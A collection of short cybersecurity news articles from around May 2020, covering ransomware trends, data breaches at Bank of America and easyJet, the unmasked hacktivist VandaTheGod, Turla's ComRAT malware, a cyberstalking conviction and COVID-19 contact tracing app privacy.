There has been a substantial rise in phishing attacks recently as a result of the increase in people working from home during the COVID-19 pandemic, with security systems and practices difficult to maintain for many businesses in these circumstances.

Barracuda Networks added that security methods such as multi-factor identification and email security software are especially vital for organizations at this time.

Check Point Unmasks Hacktivist Who Defaced Nearly 5000 Sites

Check Point Unmasks Hacktivist Who Defaced Nearly 5000 Sites

Security researchers are claiming victory after unmasking an infamous hacktivist who defaced nearly 5000 websites in more than 40 countries over the past few years.

The individual, known online as “VandaTheGod” on Twitter, took to social media to publicize his exploits, sometimes under aliases such as “Vanda de Assis” and “SH1N1NG4M3,” according to Check Point.

This activity first alerted the security firm to his presence, and also provided a trail of clues which ultimately led them to his real identity: an individual living in the south-eastern Brazilian municipality of Uberlandia.

Active since 2013, the hacktivist never reached his stated personal goal of compromising over 5000 websites. However, thousands of government, academic and corporate sites were apparently defaced with anti-government and social justice messages thanks to his work.

In the last year, over half (57%) were located in the US — where victims included the official website of the state of Rhode Island and the city of Philadelphia — while Australia and the Netherlands rounded out the top three targeted countries.

VandaTheGod was also active in his home country, defacing a Brazilian government website with the hashtag #PrayforAmazonia, in response to the increase in rainforest clearing approved by right-wing President Bolsonaro.

However, his motives weren’t always so altruistic, and occasionally strayed into theft of credit card details and log-ins. VandaTheGod is said to have attempted to breach details from public figures, universities and even hospitals — one on occasion offering to sell the medical records of one million New Zealand patients for $200 per record.

“This case highlights the level of disruption that a single, determined individual can cause internationally. Although ‘VandaTheGod’s’ motive originally seemed to be protesting against perceived injustices, the line between hacktivism and cybercrime is thin,” argued Check Point manager of threat intelligence, Lotem Finkelsteen. 

“We often see hackers taking a similar path from digital vandalism to credentials and money theft as they develop their techniques. Revealing the person’s true identity and disclosing it to law enforcement should put an end to their extensive disruptive and criminal activities.”

Ransomware Demands Soared 950% in 2019

Ransomware Demands Soared 950% in 2019

Ransomware operators had another standout year in 2019, with attacks and ransom demands soaring according to new data from Group-IB.

The Singapore-based security vendor claimed that, after a relatively quiet 2018, ransomware was back with a vengeance last year, as attack volumes climbed by 40%.

As large enterprises became an increasing focus for attacks, ransom demands also soared: from $8,000 in 2018 to $84,000 last year. That’s a 950% increase.

The “greediest ransomware families with highest pay-off” were apparently Ryuk, DoppelPaymer and REvil, the latter on occasion demanding $800,000.

As mentioned, last year saw an increasing number of attackers focus their efforts on larger targets, often using sophisticated APT-style tactics, according to Group-IB. This included trojans such as Dridex, Emotet, SDBBot, and Trickbot to compromise victims and post-exploitation frameworks such as Cobalt Strike, CrackMapExec , PowerShell Empire, PoshC2, Metasploit, and Koadic to gather info on the targeted network. Data theft also became a popular way to force payment.

Phishing emails continued to be the number one initial threat vector, alongside RDP compromise and websites infected with exploit kits, the security vendor added.

“The year of 2019 was marked by ransomware operators enhancing their positions, shifting to larger targets and increasing their revenues, and we have good reason to believe that this year they will celebrate with even greater achievements,” said Group-IB senior digital forensics specialist, Oleg Skulkin.

“Ransomware operators are likely to continue expanding their victim pool, focusing on key industries, which have enough resources to satisfy their appetites. The time has come for each company to decide whether to invest money in boosting their cybersecurity to make their networks inaccessible to threat actors or risk being approached with ransom demand and go down for their security flaws.”

Ransomware operators have indeed picked up where they left off at the end of 2019, launching a blizzard of attacks against firms struggling to adapt to mass remote working, as well as hospitals fighting COVID-19.

According to Coveware, the average ransom paid in the first three months of the year surged by 33% quarter-on-quarter. However, contrary to Group-IB’s analysis, it claimed that despite the “big game hunting” narrative, most victims are likely to be SMBs.

The average number of employees in ransomware victims was 625 in Q1, with the median a much smaller 62.

#COVID19 Drives Dealers Online as Drugs Supply Soars

#COVID19 Drives Dealers Online as Drugs Supply Soars

The supply of dark web drugs soared nearly 500% over the first few months of this year as dealers took to the internet to continue trading, according to new data from Sixgill.

The cyber-intelligence company monitors multiple underground sites and forums for its customers.

It reported that although the supply of malware, phishing kits, and stolen accounts has been pretty steady over the past 12 months, that of illegal drugs has spiked recently as government lockdowns forced individuals off the streets.

The firm claimed that the number of items for sale in December 2019 stood at 4154, but this had risen to 24,719 by April 2020 — an increase of 495%.

MDMA postings apparently grew 224%, cannabis postings were up 555%, and cocaine posts spiked 1000% over the period.

“Feedback, while an imperfect metric for purchase volume, is a reliable indicator of the rate of transactions,” Sixgill explained. “Feedback volume for cannabis, cocaine, and MDMA all nearly doubled over the past half year.”

However, despite this surge in online supply and a likely uptick in sales, the underground market was not immune to the same dynamics as legitimate economic sectors.

“As with all online shopping, shipping delays occurred, with dark web chatter suggesting that slower delivery times dinged the reputations of vendors among a cynical customer base that’s always vigilant for scammers. Though the rise in chatter and concerns was temporary, it did make both vendors and consumers more conscious of the risks of international shipping for illegal goods,” the security firm explained.

“While supply surged, demand lagged and never caught up, rising later and at a slower pace. That led to a 10-fold surge in mentions of ‘bargains’ and ‘discounts’ in early 2020. That’s not only a response to oversupply, but a reaction to consumers’ precarious economic situation during the economic freeze.”

New York Teen Masterminds $23.8m Crypto Heist

New York Teen Masterminds $23.8m Crypto Heist

An American cryptocurrency investor is suing a New York high school senior over the theft of $23.8m in digital currencies.

Michael Terpin has filed a civil complaint against 18-year-old Ellis Pinsky alleging that in 2018, at the tender age of 15, Pinsky masterminded a plot to defraud Terpin out of millions.

Pinsky was allegedly the leader of what Terpin described as a "gang of digital bandits" who stole from multiple victims after using SIM swapping to gain control of their smartphones.

None of the teen's alleged co-conspirators were named in the complaint, in which Terpin accuses them and Pinsky of racketeering and computer fraud. 

Terpin claims that, after hijacking the native wallet on his BlackBerry, Pinsky cockily bragged to his peers that he would get away with his cybercrime. 

“On the surface, Pinsky is an ‘All American Boy,’” Terpin said in a complaint filed May 7 in a federal court in White Plains, New York. “The tables are now turned.”

In May last year, Terpin won a $75.8m civil judgement in a California state court in a related case against an alleged associate of Pinsky, Nicholas Truglia, who has faced criminal hacking charges. Now Terpin is gunning for Pinsky, seeking triple damages of $71.4m.

According to Reuters, court records show that Terpin is also suing his carrier AT&T Mobility in Los Angeles for $240m. 

To his classmates at Irvington High School, Pinsky was an unremarkable individual who achieved decent grades and liked playing soccer. 

At the time of the alleged crypto-heist, Pinsky was living in a $1.3m home he shared with his family. An anonymous insider told the New York Post that Pinsky explained his newfound wealth to his parents by saying that he had gotten lucky making Bitcoin online through video games.  

The teen allegedly used the stolen money to travel by private jet, purchase an Audi R8, and splash out on the latest sneakers. 

Pinsky's attorney, Noam Biale, told the New York Post: “Ellis was a child at the time of the alleged conduct. . . . It is deeply unfortunate that Mr. Terpin has chosen to bring [a] lawsuit, full of smears and baseless allegations, for no imaginable purpose other than spite.”

Data Breach at Bank of America

Data Breach at Bank of America

Bank of America Corporation has disclosed a data breach affecting clients who have applied for the Paycheck Protection Program (PPP). 

Client information was exposed on April 22 when the bank uploaded PPP applicants' details onto the US Small Business Administration's test platform. The platform was designed to give lenders the opportunity to test the PPP submissions before the second round of applications kicked off.

The breach was revealed in a filing made by Bank of America with the California Attorney General's Office. As a result of the incident, other SBA-authorized lenders and their vendors were able to view clients' information. 

Data exposed in the breach consisted of details relating not only to individual businesses, but also to their owners. Compromised data may have included the business address and tax identification number along with the owner's name, address, Social Security number, phone number, email address, and citizenship status.

Bank of America, which is headquartered in Charlotte, North Carolina, said that access to the information was limited. 

In a breach notification document, a spokesperson for the bank said: "There is no indication that your information was viewed or misused by these lenders or their vendors. And your information was not visible to other business clients applying for loans, or to the public, at any time."

The bank neglected to share any specifics of which applicants were affected by the breach, stating only that it was a "small number" of clients. The exposed data was drawn from a pool of nationwide applications, meaning that businesses in multiple states may have been impacted.

More than 305,000 PPP relief applications have been processed by Bank of America with the SBA.

Upon discovering the breach, the bank asked the Small Business Administration to remove the visible information. According to the filing, the SBA resecured the exposed data within one day of its being accidentally exhibited. 

The bank said that the PPP application and submission processes were not affected by the cybersecurity mishap. An internal investigation has been launched to determine how the data came to be exposed. 

Bank of America is offering clients affected by the breach free two-year membership of Experian's identity theft protection program.

Thais Ditch Twitter for Blockchain-Based Social Network Minds

Thais Ditch Twitter for Blockchain-Based Social Network Minds

Thais are deserting Twitter in favor of the blockchain-based social networking tool Minds.

Minds is a free and open source distributed social networking service that gives users ERC20 tokens that can be used to promote content or crowdfund other users. Tokens are awarded based on the time a user spends accessing the service and the number of interactions that they have.

The platform was founded in 2011 and is headquartered in Wilton, Connecticut. Unlike some social media platforms that are moving toward increased censorship, Minds describes its content policy as "based on the First Amendment and governed by a community jury in order to minimize bias and censorship."

Minds founder Bill Ottman told Coconuts Bangkok that the platform saw a spike of 100,000 new Thai users in a single day last week, causing the service to crash temporarily. According to Minds, there are now more than 200,000 Minds users in Thailand.

Ottman said: “We are thrilled to provide privacy, internet freedom and digital rights for Thai netizens. This is exactly the reason Minds exists.”

Among the Thai Twitter users to defect to Minds was prominent writer and social critic Sarinee Achavanuntakul. Her final tweet, posted on May 21, read, “Say goodbye to Twitter and meet at Minds.”

Twitter became popular in Thailand as a way for citizens to speak their minds anonymously in a country where speech is harshly restricted and the lese-majeste law forbids the insulting of the monarchy. 

Journalists who criticize Thailand's military rule are detained by the government and subjected to what the Committee to Protect Journalists describes as "attitude adjustment sessions."

According to Quartz, Thais have "grown wary and distrustful of Twitter over a recent string of developments on the platform that sparked privacy concerns."

One such development was an update to Twitter's privacy policy on May 19, giving the platform permission to share device-level data like a user's IP address with its business partners. 

The update came days after Twitter announced in a blog post that the company had launched an official Twitter Thailand account and partnered with the Thai government and local NGOs.

Achavanuntakul said in recent months, young users "who have been critical of the monarchy” on Twitter have received visits from the police at home.

UK Energy Operators Join the European Network for Cybersecurity

UK Energy Operators Join the European Network for Cybersecurity

The National Grid Gas Transmission (NGGT) and National Grid Electricity Transmission (NGET) in the UK have become the newest members of the European Network for Cybersecurity (ENCS), in a move designed to better protect the European energy sector against cyber-attacks. The NGGT and NGET will now engage in information sharing regarding cyber-threats with a number of major utility organizations across Europe. 

The ENCS already works on cybersecurity in electricity and gas across Europe, both at the distribution and transmission levels. In addition to sharing expertise, energy organizations that are part of the group collaborate on capacity building, conduct training and provide security testing and standards for a range of components such as smart meters.

The NGGT and NGET are both part of National Grid plc, which is one of the world’s largest investor-owned energy utilities, and works to deliver electricity and gas safely and efficiently to customers in the UK.

Anjos Nijk, managing director of the ENCS, commented: “The National Grid already ranks among the most sophisticated transport system operators (TSOs) in terms of cybersecurity, and by joining the ENCS, it demonstrates its commitment to that improving even further – and of course, brings a wealth of experience to the table that our members will benefit from.

“The energy sector is only becoming more interconnected, and it is vital those of us looking to protect it do the same.”

The NGGT and NGET become the first UK-based organizations to join the ENCS.

Paul Lee, engineering manager for cyber and control systems at National Grid, added: “We have robust cybersecurity measures in place across all our operational infrastructure and IT to protect against cyber-threats, but our membership will help us to benefit from the ENCS knowledge base as we share information with other members, contributing to increased protection across all critical infrastructure.”

The energy sector has been a frequent target of cyber-criminals. Last month, it was claimed that energy firm EDP was hit with a €10m ransomware threat.

Nearly One Fifth of Law Firms Show Signs of Compromise

Nearly One Fifth of Law Firms Show Signs of Compromise

Cybersecurity experts are calling for the legal sector to be defined as critical to securing national infrastructure, after revealing that 100% of law firms were targeted by attackers in the first quarter of 2020.

BlueVoyant appraised thousands of law firms worldwide between January and March 2020, to compile its latest report, Sector 17 – The State of Cybersecurity in the Legal Sector.

Of those targeted, some 15% are likely to have been compromised while nearly half showed signs of suspicious activity, including malicious proxy use, it said.

The near-$1 trillion sector is a prime target for financially motivated attacks as well as nation state actors looking for sensitive information they can use to make money or leverage geopolitically.

The report details examples of ransomware threats, financial data and PII theft, third-party risks, password breaches, insider leaks and hacktivism.

These include stand-out cases such as the 2016 Panama Papers breach of law firm Mossack Fonseca, the 2017 ‘ransomware’ outage at DLA Piper caused by NotPetya, and this year’s Luanda Leaks breach which revealed incriminating evidence on the former President of Angola.

BlueVoyant, a firm which counts former GCHQ director Robert Hannigan as its chairman, wants the sector to be added to the 16 others defined by the Department of Homeland Security as critical to securing national infrastructure, resources and resiliency.

“The stakes could not be higher. While the legal sector is performing well in comparison to the other 16 sectors, attacks against law firms constitute some of the most sensational and damaging cyber-attacks in history. We have already seen how recent incidents can cause substantial geopolitical fallout, not to mention tremendous direct and indirect financial repercussions for law firms,” argued CEO Jim Rosenthal.

“Threat actors are aggressively targeting law firms, and they are doing so daily. Threats against law firms are high volume, multi-faceted, and organized; threat actors use multiple sophisticated tools and techniques; and, notwithstanding industry-leading efforts, law firms have been successfully compromised.”

DNS Traffic Analysis Detects Hidden DDoS Attacks

DNS Traffic Analysis Detects Hidden DDoS Attacks

New research has found a measurable increase in DNS cache miss traffic levels, and a number of previously unknown DDoS events.

According to Farsight Security, analysis of DNS cache miss traffic levels over the two-month period of March-April 2020 revealed “a macroscopic phenomenon.” The analysis was done over 300 domains for leading travel and transportation, retail, streaming video, higher education and news and partisan opinion sites.

Using its DNSDB intelligence solution, Farsight said that it looked at daily DNS transactions for over 300 sites and when reviewing traffic for these sites, it looked at the DNS cache miss traffic for all hostnames under a given delegation point. This revealed some websites experiencing spikes in volume, which Farsight stated represent denial of service (DDoS) attack traffic reflexively targeting unrelated third-party sites.

It said at least two distinct reflective DDoS attack patterns took place among the studied sites: one pattern type which appeared to be purely associated with abusive DNS SOA (Start of Authority) queries, and a second pattern type which melds abusive DNS SOA queries with abusive DNS TXT queries for wildcarded SPF redirect records.

Also some sites experienced spikes in volume that were so large that the spikes caused most of the “normal variation” in traffic volume to “wash out” due to the dominance of the spike or spikes.

Dr. Paul Vixie, chairman, CEO and co-founder of Farsight Security, said whilst headlines focused on a virus pandemic, most of the DNS traffic related to those headlines will be due to fraudulent or criminal activity by those hoping to cash in on the public's attention. “Therefore, it is worth our time to study DNS traffic patterns during every global event, to characterize current abuses of the system and to predict future abuses,” he said.

Farsight also discovered a step up pattern in traffic, typically reflecting a four-to-seven-times increase in DNS cache miss traffic levels, across most or all verticals during the same period.

To reduce the risk of DDoS events, Farsight recommended that nameserver vendors ship their products with Response Rate Limiting (RRL) enabled by default. Farsight also recommended all authoritative name server operators confirm that their current configurations have RRL enabled. 

Trump Election Tweet Labelled Fake News

Trump Election Tweet Labelled Fake News

Donald Trump has decided to pick a fight with Twitter after one of his posts on the upcoming election was labelled misleading by the social media platform.

The original tweet claimed that Mail-In (postal) ballots during the November Presidential election would be “substantially fraudulent.”

The issue has become a partisan one of late, as Democrats push for voters to have the option of mailing in their votes to avoid the risk of COVID-19 infection at the polling booth. They claim that otherwise, millions of voters may be disenfranchised as they stay at home.

Many Republicans, including Trump, believe higher voter turnouts enabled by postal voting would give their opponents an advantage, as groups that would otherwise stay home are more likely to vote Democrat.

Twitter labelled Trump’s tweet with a clickable blue notification stating "get the facts about mail-in ballots," which takes them to a page debunking the false assertion that postal votes lead to election fraud.

Unsurprisingly, Trump hit back, branding Twitter’s response as stifling free speech and interfering in the 2020 election.

In fact, many commentators have argued that Twitter has been too easy on Trump in recent months and years, saying that his status and 80 million followers have given him carte blanche to say things that others would be blacklisted for.

Twitter’s decision can be seen in the context of its newly updated policy on misleading information. Because the propensity for harm was judged “moderate” in this case, the platform merely labelled Trump’s tweet, but if that rating is upped to “severe” then future posts could be removed.

Either way, the incident is likely to be just the first of many ahead of the election as Trump seeks to fire up his base with increasingly outlandish statements on social media.

UK Public Backlash Could Scupper #COVID19 App

UK Public Backlash Could Scupper #COVID19 App

The UK’s plans to ease its COVID-19 lockdown have been thrown into doubt after half the public said it does not trust the government to handle their data collected via a key contact tracing app.

The app is a crucial part of the best practice “test, track and trace” strategy being rolled out around the world to help businesses and society get back to normal after weeks of social distancing.

“The NHS COVID-19 app automates the process of contact tracing,” noted the NHS. “Its goal is to reduce the transmission of the virus by alerting people who may have been exposed to the infection so they can take action to protect themselves, the people they care about and the NHS.”

It’s currently being trialled on the Isle of Wight ahead of a slated June 1 launch nationwide.

However, in a new survey of 1000 UK adults, Anomali found that 48% do not trust the government to keep the data collected by the app safe. A further 43% said they were concerned it would give hackers an opportunity to send phishing emails and texts — something only 52% said they felt savvy enough to be able to spot.

“It’s tough to predict the increase in the volume of attacks we’ll see. However, we’re already seeing thousands of rogue and spoof COVID-19 domains being registered and used in attacks,” Anomali head of EMEA, Jamie Stone, explained.

“Global interest around the virus, and each nation’s track-and-trace apps, means that attackers will likely use many of these domains to host phishing attacks via both email and SMS. People using COVID tracking apps need to be extremely vigilant and aware, ensuring that they’ve installed official government apps and that they are interacting with authentic messages from the agencies.”

Respondents also raised concerns about government surveillance: a third (33%) claimed the app may be able to track their whereabouts and 36% said that it may allow the government to collect data on them.

Unlike many being developed across Europe and elsewhere, the NHS app is said not to rely on an API developed by Apple and Google’s which allows collected data to be stored on the user’s device.

Instead, it is centralized, although the NHS claimed that no personally identifiable data is collected, the app will conform to UK law, and that data “will only ever be used for NHS care, management, evaluation and research.”

For voluntary contact tracing apps like this one to make a meaningful contribution to “test, track and trace” they need to be downloaded and used by 80%+ of current smartphone users. That makes confidence in the government’s approach crucial.

Yet there is widespread suspicion of government surveillance and data misuse in the UK thanks to incidents like the Windrush scandal and 2016 legislation known as the Investigatory Powers Act, aka the Snooper’s Charter.

This has been compounded by recent events, in which the Prime Minister’s chief advisor, Dominic Cummings, was found to have driven over 250 miles during lockdown, breaking the guidelines he helped to draw up.

Deputy Sheriff Admits Cyberstalking Massachusetts Tween

Deputy Sheriff Admits Cyberstalking Massachusetts Tween

A former deputy sheriff has pleaded guilty to cyberstalking and sexually exploiting a teenage girl whom he met through playing Minecraft online. 

When 26-year-old Texan Pasquale T. Salas first encountered his victim in 2014, she was just 12 years old. 

Salas engineered a relationship with the child by sending her messages in private chat rooms. The former deputy sheriff with the Matagorda County Sheriff’s Office then systematically used Skype, Snapchat, and text messages to groom the little girl.

Authorities said that during their digital exchanges, Salas put repeated pressure on his tweenage victim to capture sexually explicit images of herself and send them to him. 

At his coercion, the victim sent hundreds of lewd videos and images of herself to Salas over a two-year period. Some of the images were sent as they communicated via Minecraft. 

In a sick attempt to make the exploitation appear like a genuine relationship, Salas sent his victim jewelry, Edible Arrangements, and iTunes gift cards and granted her access to his Amazon Prime account.

The exploited girl, who is from Worcester County, tried to break off contact with Salas in 2016. The self-confessed sexual predator responded by repeatedly threatening to send lewd images of the victim to her family and friends unless she kept communicating with him.

Salas used technology to control his victim. He manipulated her into granting him access to her Snapchat, then used a tracking option on the app to keep tabs on the girl's whereabouts. 

The girl was ordered to obey a list of rules written by Salas that dictated what she could wear and whom she could speak with. 

According to authorities, Salas threatened to harm the girl's sister if she disobeyed him. He also meted out punishments to his victim when she went against his wishes.

Salas told the girl, “You belong to me. You’re my property so I can treat you however I want, whenever I want.”

Authorities said a second female victim had been sexually exploited by Salas for four years. Victim number 2 was also aged 12 when she met Salas via Minecraft. 

Salas, who is in custody at the Donald W. Wyatt Detention Facility in Rhode Island, will be sentenced on September 3.

International Plea for Governments to Protect Healthcare from Cyber-Attacks

International Plea for Governments to Protect Healthcare from Cyber-Attacks

A plea from the Cyber Peace Institute for healthcare providers to be protected against cyber-threats has attracted international support.

Major players in cybersecurity, academics, and numerous political movers and shakers have backed the call for governments to work together "with civil society and the private sector" to defend hospital, healthcare, and medical research facilities from digital assaults. 

In a strongly worded plea published May 26, the Cyber Peace Institute asked governments to assert in unequivocal terms that the targeting of healthcare facilities by cyber-criminals is both "unlawful and unacceptable."

"We call on the world’s governments to take immediate and decisive action to stop all cyberattacks on hospitals, healthcare and medical research facilities, as well as on medical personnel and international public health organizations," wrote the CPI. "To this end, governments should work together, including at the United Nations, to reaffirm and recommit to international rules that prohibit such actions."

The CPI highlighted recent cyber-assaults against healthcare providers around the world, cynically timed to coincide with the outbreak of COVID-19 in nearly every corner of the planet. 

"Over the past weeks, we have witnessed attacks that have targeted medical facilities and organizations on the frontlines of the response to the COVID-19 pandemic," wrote CPI. 

"These actions have endangered human lives by impairing the ability of these critical institutions to function, slowing down the distribution of essential supplies and information, and disrupting the delivery of care to patients." 

While the rate of deaths caused by the novel coronavirus continues to fall in some countries, bringing hope that the pandemic is ebbing, the CPI's plea warns against complacency.

"With hundreds of thousands of people already perished and millions infected around the world, medical care is more important than ever," wrote the CPI. "This will not be the last health crisis."

Political bigwigs who have signed the Institute's rally call include former presidents of the Soviet Union, Uruguay, Brazil, Liberia, Chile, Swiss Confederation, Mexico, Colombia, Denmark, Poland, and Slovenia, as well as former US secretary of state Madeleine Albright.

Signatories from the cybersecurity industry include Kaspersky CEO Eugene Kaspersky, Microsoft president Brad Smith, and Trend Micro CEO Eva Chen.

National Guard Helps Maryland with Cybersecurity

National Guard Helps Maryland with Cybersecurity

The National Guard has been working to keep Maryland safe from cyber-attacks.

Maryland governor Larry Hogan called in the National Guard by executive order on March 12 to bolster the state's COVID-19 pandemic response. In addition to assisting the Old Line State with its coronavirus testing and screening program, the Guard has been helping out with cybersecurity assessments.

Baltimore, Maryland's largest city, was rocked by a catastrophic ransomware attack last year that prevented government officials from performing even basic tasks like sending an email. 

In an interview with Federal Computer Week, Colonel Reid Novotny, Maryland National Guard's joint staff (J6) lead for IT and cyber, said that surviving a major attack did not make Baltimore invulnerable to cyber-criminals. 

"During this crisis, we are in daily contact with them [in] an elevated status," said Novotny. “There have been ransomware attacks that have affected hospitals that are treating COVID patients."

Novotny wouldn't specify which hospitals had been targeted but said that attacks had been observed in Baltimore and Baltimore County.

"Yes, that stuff has actually happened, and the department of IT has responded back, and the Guard has supported that response," he said.

"Patients and the residents of that county that went to that hospital were assured that everyone was up and working."

The state's chief information security officer, Chip Stewart, said that malicious activity against Maryland had increased since the outbreak of COVID-19. 

"Maryland has noticed an increased frequency of attempted cyber-attacks as have many other states throughout the country, ranging from phishing emails to sophisticated attempts to bypass security measures," said Stewart.

To counter the threats, Maryland has established a security operations center to monitor attacks on its digital infrastructure.

According to Stewart, the National Guard is supporting the state's efforts to thwart cyber-attackers by performing "routine external assessments of the state's websites and networks to identify issues proactively."

As of May 15, the Maryland National Guard has supplied over 3,000 hours of support to four different state agencies across four of Maryland's counties. Novotny said the commercial value of the Guard's cyber-support was roughly $1m.

New Version of Turla Malware Poses Threat to Governments

New Version of Turla Malware Poses Threat to Governments

Details of a new version of the ComRAT backdoor, one of the oldest malware families run by the notorious cyber-espionage group Turla, have been outlined by ESET. The findings will be of particular concern for government agencies, such as militaries and diplomats, with this updated backdoor able to use Gmail web UI to receive commands and exfiltrate data to try and steal confidential documents.

The Turla group, also referred to as ‘Snake,’ has been operating for at least 10 years, primarily targeting governments across Europe, Central Asia and the Middle East. It has breached a number of major organizations including the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014.

One method it uses to steal important information is the malicious backdoor, comRAT, which is believed to have been first released in 2007. “Based on the victimology and the other malware samples found on the same compromised machines, we believe that ComRAT is used exclusively by Turla,” noted Matthieu Faou, malware researcher at ESET.

ESET has found evidence the fourth version of the malware, which has attacked at least three government institutions since 2017, was still active in January 2020. The operators used public cloud services such as OneDrive and 4shared to exfiltrate data.

The new version uses a completely new code base and is far more complex than earlier incarnations. It can perform a number of new actions on compromised computers, such as executing additional programs and exfiltrating files, whilst having unique abilities to evade security software.

“This shows the level of sophistication of this group and its intention to stay on the same machines for a long time,” explained Faou. “Additionally, the latest version of the ComRAT malware family, thanks to its use of the Gmail web interface, is able to bypass some security controls because it doesn’t rely on any malicious domain.”

Customized Android Builds Drive Global Security Inequality

Customized Android Builds Drive Global Security Inequality

Security experts have warned that default regional settings and pre-loaded applications may be exposing Android devices in some countries to a greater risk of cyber-attack.

F-Secure claimed today that large numbers of pre-bundled apps can expand the attack surface of a device.

The impact is potentially worse when country-specific rules block access to Google Play, meaning that users have to rely on third-party stores curated by the phone manufacturers themselves.

F-Secure claimed it found multiple vulnerabilities in the Huawei AppGallery which could be used to “create a beachhead” to launch additional attacks, such as one targeting the Huawei iReader which could allow hackers to execute code and steal data from devices.

Meanwhile, a simple phishing email/message could be enough to compromise the default configuration on the Xiaomi Mi 9 for China, India, Russia and maybe other countries, the security vendor claimed.

In another case, the research team compromised a Samsung Galaxy S9 by exploiting the fact that the device changes its behavior according to which country issued the SIM inside it.

“To perform this attack, an adversary must manipulate an affected Galaxy S9 user into connecting to a Wi-Fi network under their control (such as by masquerading as free public Wi-Fi),” F-Secure explained.

“If the phone detects a Chinese SIM, the affected component accepts unencrypted updates, allowing an adversary to compromise the device with a man-in-the-middle attack. If successful, the attacker will have full control of the phone.

F-Secure warned that as the number of customized Android builds grows, the white hat community needs to double down on research.

“It’s important for vendors to consider the security implications when they’re customizing Android for different regions,” added senior security consultant, Toby Drew.

“People in one region aren’t more or less entitled to security than another, and if you have the same device configured to provide a less secure experience to users in one region compared to another, it’s creating a type of inequality by increasing their exposure to attacks.”

Data on 29 Million Indian Jobseekers Leaked

Data on 29 Million Indian Jobseekers Leaked

The personal details of over 29 million Indian jobseekers have been posted to a dark web site, free for anyone to access.

Cybersecurity firm Cyble, which discovered the trove on an unnamed hacking forum, has in turn added the compromised information to its breach notification site AmIBreached.

It claimed to have found the posting during a regular sweep of the dark and deep web. The 2.3GB file includes email, phone, home address, qualification, work experience, current salary, employer and other details on job-hunters from all over India.

“Cyber-criminals are always on the lookout for such personal information to conduct various nefarious activities such as identity thefts, scams and corporate espionage,” said Cyble.

The vendor claimed that the leak had originated from a CV aggregation service which collected the data from legitimate job portal sites. An update over the weekend clarified that the data may have been initially exposed by an unprotected Elasticsearch instance, subsequently made inaccessible.

It continues to investigate these claims.

In the meantime, it spotted another threat actor posting nearly 2000 Aadhar identity cards for free onto a hacking forum. They appear to originate from Madhya Pradesh state.

Also over the weekend, Cyble claimed that three hacking forums have themselves been breached, exposing user details and private chats.

The firm said it had been able to obtain databases related to Sinful Site, SUXX.TO and Nulled.

“All these hacking forums are based on general discussion and sharing of related resources. It is a place where users can find lots of great data leaks, hacking and cracking tools, software, tutorials, and much more. Along with that, over here the users can also take part in active discussions and make new friends,” it explained.

Specifically, the firm now has detailed info on users of SUXX.TO and Nulled, which were dumped on May 20, and private messages from Sinful Site, which were leaked on May 15.

Lawyers Aim £18bn Class Action Suit at easyJet

Lawyers Aim £18bn Class Action Suit at easyJet

A specialist in group litigation has filed a potential £18bn class action claim against easyJet in London’s High Court, following the firm’s major data breach disclosure last week.

International law firm PGMBM said it had been contacted by “numerous affected people” and is urging more to come forward to join the case, which would pay out £2000 per impacted customer. 

It clarified that Article 82 of EU General Data Protection Regulation (GDPR) grants customers the right to compensation for inconvenience, distress, annoyance and loss of control of their personal data.

The Luton-headquartered airline revealed last week that a “highly sophisticated” attack on its IT infrastructure had compromised email addresses and travel details of nine million passengers, as well as the credit card details of just over 2200.

Despite claiming that it had no evidence that any of the stolen info had been misused, the airline warned those affected about follow-on phishing attacks.

Although it notified UK regulator the Information Commissioner’s Office (ICO) back in January, at around the time of the incident, it took several months for the firm to come clean to customers.

PGMBM has also claimed that the exposure of customers’ travel plans could pose security risks to those individuals, as well as being a gross invasion of privacy.

“This is a monumental data breach and a terrible failure of responsibility that has a serious impact on easyJet’s customers,” argued managing partner, Tom Goodhead.

“This is personal information that we trust companies with, and customers rightly expect that every effort is made to protect their privacy. Unfortunately, easyJet has leaked sensitive personal information of nine million customers from all around of the world.”

The case highlights the potentially serious financial repercussions of a major data breach, on top of the large fines GDPR regulators can theoretically impose.

The ICO has come in for some criticism recently after reports emerged that it may be considering a significantly lower fine than the £183.4m figure posted in a notice of intent last summer, in response to a major breach at British Airways.

Mumbai Police Force Uses ‘The Force’ for Cyber-Safety Campaign

Mumbai Police Force Uses 'The Force' for Cyber-Safety Campaign

Police in Mumbai have recruited Baby Yoda to help raise awareness of the importance of cyber-safety. 

The law enforcement agency has earned a reputation online for delivering serious messages with humorous memes via social media app Instagram. It only seems appropriate that the force should use the power of 'The Force' to drive home a warning that passwords should be kept private.

On Monday, Mumbai Police shared an image of a popular meme that uses characters from TV space Western series Star Wars: The Mandalorian. In the meme, the show's lone gun fighter shares an amusing exchange with the famous character Baby Yoda.

The meme shows the fighter telling Baby Yoda to close his eyes, after which he asks him, "What do you see, bro?"

Yoda shutters his peepers and replies, "Nothing, bro."

In an amusing edit to the next line of dialogue, Mumbai Police tweaked the meme so that the fighter tells Yoda: "That's your bank balance after you shared your password with me, bro."

Along with the meme, Mumbai Police share the following caption with their 126K Instagram followers: "Share password, do not. There is no question of do."

The funny post was a hit with netizens who expressed their appreciation by filling the comments section with compliments. 

Instagram user rohitksp wrote, "Mumbai police is getting cooler day by day," while user tanabhy punned, "Mumbai police, Yoda best."

User dandekarvaibhav added: "Mumbai Police shared a Star Wars themed meme... My day is made."

User uppalakshit took the joke one step further, quipping, "That's the Bank balance during Lockdown..."

Not every heart was won by the force's attempt to raise awareness of cybersecurity in a humorous way. One user expressed the view that Mumbai police ought to be focusing their resources elsewhere. 

User ashwitha4real wrote in the comments: "Memes are great but there are groups on telegram that are sexually assaulting women, making videos and sharing it. Kindly do something about it."

At time of publication, the Baby Yoda post had garnered 23,291 likes on Instagram and attracted 209 comments.

North Dakota’s Contact Tracing App Sends User Data to Third Parties

North Dakota's Contact Tracing App Sends User Data to Third Parties

A cybersecurity company has claimed that a contact tracing app introduced by North Dakota is sending data to third parties and exposing users' identities.

Like South Dakota and Utah, North Dakota has built its own contact-tracing app, Care19, in an effort to monitor the spread of the novel coronavirus.

Jumbo Privacy alleges that the Care19 app, created by ProudCrowd LLC to track the spread of COVID-19 in The Peace Garden State, is sharing user data with Foursquare and other third-party services.

Foursquare is a location service that provides advertisers with tools to reach audiences who have been at specific locations.

Users of the Care19 app are told in the privacy policy that their "location data is private to you and is stored securely on ProudCrowd, LLC servers. It will not be shared with anyone including government entities or third parties, unless you consent or ProudCrowd is compelled under federal regulations.”

North Dakota claims that users of the app cannot be individually identified. On the state's website in the app FAQ section it states that “the application does not have any information that is tied to an individual person” and information uploaded via the app is "100% anonymous." 

